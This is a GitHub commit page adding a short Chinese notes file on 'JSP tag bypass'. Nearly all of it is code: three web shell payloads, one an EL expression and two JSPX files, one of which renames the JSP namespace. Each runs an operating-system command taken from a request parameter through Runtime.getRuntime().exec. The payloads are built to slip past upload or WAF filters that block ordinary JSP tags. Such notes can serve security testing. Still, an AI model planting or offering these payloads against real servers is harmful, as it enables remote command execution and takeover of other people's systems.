Skip to content

Commit 61d5ce0

Browse files
FirebaskyFirebasky
authored
Create jsp标签绕过.md
1 parent f798814 commit 61d5ce0

1 file changed

Lines changed: 27 additions & 0 deletions

File tree

java日常/jsp标签绕过.md

Lines changed: 27 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,27 @@
1+
# jsp标签绕过
2+
3+
## el表达式
4+
5+
```
6+
${Runtime.getRuntime().exec(param.cmd)}
7+
```
8+
9+
## jspx利用命名空间绕过
10+
11+
```jsp
12+
<bbb:root xmlns:bbb="http://java.sun.com/JSP/Page" version="1.2">
13+
<bbb:scriptlet>
14+
Runtime.getRuntime().exec(request.getParameter('cmd'))
15+
</bbb:scriptlet>
16+
</bbb:root>
17+
```
18+
19+
## jspx利用<jsp:expression>绕过
20+
21+
```jsp
22+
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">
23+
<jsp:expression>
24+
Runtime.getRuntime().exec(request.getParameter('cmd'))
25+
</jsp:expression>
26+
</jsp:root>
27+
```

0 commit comments

Comments
 (0)